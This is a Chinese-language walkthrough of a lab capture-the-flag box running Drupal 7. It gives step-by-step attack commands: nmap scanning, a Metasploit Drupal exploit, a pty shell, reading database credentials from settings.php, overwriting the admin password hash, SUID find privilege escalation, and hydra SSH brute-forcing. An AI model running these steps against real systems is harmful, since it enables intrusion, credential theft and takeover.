信息收集
寻找靶机真实IP
扫描网段中有哪些主机在线,使用 -sP 参数,不扫描端口,只扫描「存活主机」。
本质上是Ping扫描,能Ping通有回包,就判定主机在线。
namp -sp 192.168.254.0/24
探端口及服务
nmap -A -p- -v 192.168.254.130-A 综合性扫描 -v 冗余模式
发现开放了22、80、111端口,分别对应的是ssh服务、web服务、rpcbind服务
访问web端口
发现是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS
searchsploit drupal 7
也可以百度一下drupal漏洞
利用MSF渗透
进入MSF控制台
msfconsole
搜索drupal模块
search drupal
利用2018年漏洞测试
使用use进行选择
use 1
执行whoami
发现是www-data权限
进入home目录,发现flag4.txt文件,提示需要提升权限
使用python反弹一个交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
显示了当前路径
查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件
直接搜索drupal的默认配置文件
Drupal的默认配置文件为 /var/www/sites/default/settings.php
查看文件内容
cat /var/www/sites/default/settings.php
发现了flag2和数据库的账号密码
flag2提示,提升权限为root来查看敏感文件
mysql -u dbuser -p查看数据库,切换到drupaldb数据库
'username' => 'dbuser',
'password' => 'R0ck3t'
查看查找默认的Drupal user 表
select * from users;发现admin信息
解决方法:置换drupal密码
quit;
退出,进入www目录
站点路径下执行
php scripts/password-hash.sh 新密码
然后在进入数据库中把密码字段进行替换
进入mysql,输入密码,切换到drupaldb数据库
mysql -u dbuser -p
R0ck3t
use drupaldb将pass字段进行替换
update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin";两个相同代码一个引号后带空格一个不带
访问站点
进行登录,密码是之前我们自己替换的,账号是admin
admin 123
登陆之后发现flag3 点进去后发现下面有提示信息
quit;
返回站点下执行
find / -perm -4000 2>/dev/null发现find命令
使用命令测试,发现为root权限
touch 123
ls
find / -name 123 -exec "whoami" \;
cat /etc/passwd发现最后的flag4
退至root权限下执行
cd /usr/share/john
hydra -l flag4 -P password.lst ssh://192.168.254.130
-l 指定用户名
-P 加载密码字典(自定义)
ssh://ip 指定使用协议和ip地址
SSH连接登录,拿到flag4权限
